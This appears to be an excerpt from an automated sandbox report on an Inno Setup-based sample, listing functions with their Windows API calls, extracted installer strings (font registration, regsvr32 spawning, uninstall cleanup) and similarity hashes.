                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary$MessageNotifySend
                                                                                                      • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                      • API String ID: 3817813901-1884538726
                                                                                                      • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                      • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                                                      • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                      • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                                      • GetActiveWindow.USER32 ref: 00461A97
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                                      • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                                      • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                                      • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                      • String ID: A
                                                                                                      • API String ID: 2684663990-3554254475
                                                                                                      • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                                      • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                                      • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                                      • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                                        • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                      • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                      • API String ID: 884541143-1710247218
                                                                                                      • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                                      • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                                      • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                                      • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateInit_), ref: 0045D621
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflate), ref: 0045D631
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateEnd), ref: 0045D641
                                                                                                      • GetProcAddress.KERNEL32(02380000,inflateReset), ref: 0045D651
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                      • API String ID: 190572456-3516654456
                                                                                                      • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                                      • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                                      • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                                      • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                                      APIs
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                      • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                      • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                      • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$StretchText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2984075790-0
                                                                                                      • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                      • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                                      • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                      • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                      • API String ID: 2051275411-1862435767
                                                                                                      • Opcode ID: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                                      • Instruction ID: 809e342f07c36c5fe80e3456e65159aecd70c9e1b429d99a18f855550af0e9f5
                                                                                                      • Opcode Fuzzy Hash: 55f146e1ef8f4e902545c9b8fd40e77843967da88cee367bff3e11b3e7507cae
                                                                                                      • Instruction Fuzzy Hash: 97411570A043086BDB10EFD5D842B8EF7B9AB49705F51407FA904BB292DF789A0D8B19
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1B9
                                                                                                      • GetSysColor.USER32(00000014), ref: 0044D1C0
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D1D8
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D201
                                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D20B
                                                                                                      • GetSysColor.USER32(00000010), ref: 0044D212
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D22A
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D253
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D27E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1005981011-0
                                                                                                      • Opcode ID: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                      • Instruction ID: 3cb6cff9cb4fe1f97db5fca9cf7ecf77bacdc285bba155e9e6a5fbb2dce94e66
                                                                                                      • Opcode Fuzzy Hash: 0dad7e536888b1c395f42d34690ba7b0fa2f949a96348ff67bbd6a991a2663e5
                                                                                                      • Instruction Fuzzy Hash: 4921CFB42015007FC710FB6ACD8AE8B7BDCDF19319B01857AB918EB393C678DD408669
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B755
                                                                                                      • 73A0A570.USER32(?), ref: 0041B761
                                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 3731147114-1447039187
                                                                                                      • Opcode ID: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                      • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                                      • Opcode Fuzzy Hash: 4650e7e3a4975632b128e642f4d75ab8ab1f3030e92489ac81d42ae66184f42b
                                                                                                      • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041BA27
                                                                                                      • 73A0A570.USER32(?), ref: 0041BA33
                                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                                      • String ID: k H
                                                                                                      • API String ID: 3731147114-1447039187
                                                                                                      • Opcode ID: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                      • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                                      • Opcode Fuzzy Hash: 69b514878c6882b8832b1f329327574619d6a3e89a85ba6a4f0b9ad1becc3db2
                                                                                                      • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                                      APIs
                                                                                                        • Part of subcall function 00450918: SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495F55
                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495F69
                                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495F83
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F8F
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495F95
                                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495FA8
                                                                                                      Strings
                                                                                                      • Deleting Uninstall data files., xrefs: 00495ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                      • String ID: Deleting Uninstall data files.
                                                                                                      • API String ID: 1570157960-2568741658
                                                                                                      • Opcode ID: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                      • Instruction ID: fec72cc46ef3efd5c3c8e8a450f489c3c08d507a48e2b84f6ee45df75d5b7e94
                                                                                                      • Opcode Fuzzy Hash: 23da1316c50969bb810f13416529c5ad46a4d90d4c3b6db3608d618ecf590902
                                                                                                      • Instruction Fuzzy Hash: 34219571304610AFEB11EB75ECC2B2637A8EB54338F61053BF504DA1E6D678AC008B1D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1,?,?,?,?,00000000), ref: 0047050B
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004705A1), ref: 00470522
                                                                                                      • AddFontResourceA.GDI32(00000000), ref: 0047053F
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00470553
                                                                                                      Strings
                                                                                                      • Failed to set value in Fonts registry key., xrefs: 00470514
                                                                                                      • Failed to open Fonts registry key., xrefs: 00470529
                                                                                                      • AddFontResource, xrefs: 0047055D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                      • API String ID: 955540645-649663873
                                                                                                      • Opcode ID: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                                      • Instruction ID: 66ce3b01f7eb708e2302e7809b1ea03697ff66c32de1c99646f3643d23023453
                                                                                                      • Opcode Fuzzy Hash: 2b4b64eddd1924655c58b9871aff7fb9a4f934a6e6bff31d8454543361526e14
                                                                                                      • Instruction Fuzzy Hash: 62216570741204BBDB10EA669C42FAE779D9B55708F50843BB904EB3C2D67CDE028A5D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                        • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                        • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                                      • GetVersion.KERNEL32 ref: 004631CC
                                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 0046320A
                                                                                                      • SHGetFileInfo.SHELL32(004632A8,00000000,?,00000160,00004011), ref: 00463227
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00463245
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046324B
                                                                                                      • SetCursor.USER32(?,0046328B,00007F02,004632A8,00000000,?,00000160,00004011), ref: 0046327E
                                                                                                      Similarity
                                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                      • String ID: Explorer
                                                                                                      • API String ID: 2594429197-512347832
                                                                                                      • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                      • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                                                                      • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                                                                      • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                      • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC), ref: 004782E8
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                      • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                      • API String ID: 2704155762-2318956294
                                                                                                      • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                                      • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                                      • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                                      • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                                        • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                                      Strings
                                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                                      • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                                      • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                                      • Deleting directory: %s, xrefs: 0045A1BF
                                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                                      • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorFindLast
                                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                      • API String ID: 754982922-1448842058
                                                                                                      • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                                      • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                                                      • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                                      • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                                                      APIs
                                                                                                      • GetCapture.USER32 ref: 00422EB4
                                                                                                      • GetCapture.USER32 ref: 00422EC3
                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                                      • ReleaseCapture.USER32 ref: 00422ECE
                                                                                                      • GetActiveWindow.USER32 ref: 00422EDD
                                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
